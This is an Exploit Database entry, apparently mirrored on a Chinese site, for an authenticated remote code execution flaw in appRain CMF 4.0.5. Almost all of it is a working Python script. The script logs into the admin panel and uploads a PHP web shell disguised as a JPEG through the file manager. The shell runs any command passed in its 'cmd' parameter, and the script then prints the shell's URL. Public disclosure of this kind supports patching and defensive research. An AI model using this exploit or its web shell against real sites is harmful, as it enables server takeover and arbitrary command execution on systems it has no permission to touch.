appRain CMF 4.0.5 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 38 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2024-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52041/

• # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
  # Date: 04/28/2024
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://www.apprain.org
  # Software Link:
  https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
  # Version: latest
  # Tested on: MacOS
  
  import requests
  import sys
  import time
  import random
  import string
  
  def generate_filename():
  """ Generate a 5-character random string for filename. """
  return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"
  
  def login(site, username, password):
  print("Logging in...")
  time.sleep(2)
  login_url = f"https://{site}/admin/system"
  session = requests.Session()
  login_data = {
  'data[Admin][admin_id]': username,
  'data[Admin][admin_password]': password
  }
  headers = {
  'Content-Type': 'application/x-www-form-urlencoded'
  }
  response = session.post(login_url, data=login_data, headers=headers)
  if "Logout" in response.text:
  print("Login Successful!")
  return session
  else:
  print("Login Failed!")
  sys.exit()
  
  def upload_shell(session, site):
  print("Shell preparing...")
  time.sleep(2)
  filename = generate_filename()
  upload_url = f"https://{site}/admin/filemanager/upload"
  files = {
  'data[filemanager][image]': (filename, "<html><body><form method='GET'
  name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
  name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
  value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
  system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
  }
  data = {
  'submit': 'Upload'
  }
  response = session.post(upload_url, files=files, data=data)
  if response.status_code == 200 and "uploaded successfully" in response.text:
  print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
  else:
  print("Exploit Failed!")
  sys.exit()
  
  if __name__ == "__main__":
  print("Exploiting...")
  time.sleep(2)
  if len(sys.argv) != 4:
  print("Usage: python exploit.py sitename.com username password")
  sys.exit()
  site = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  session = login(site, username, password)
  upload_shell(session, site)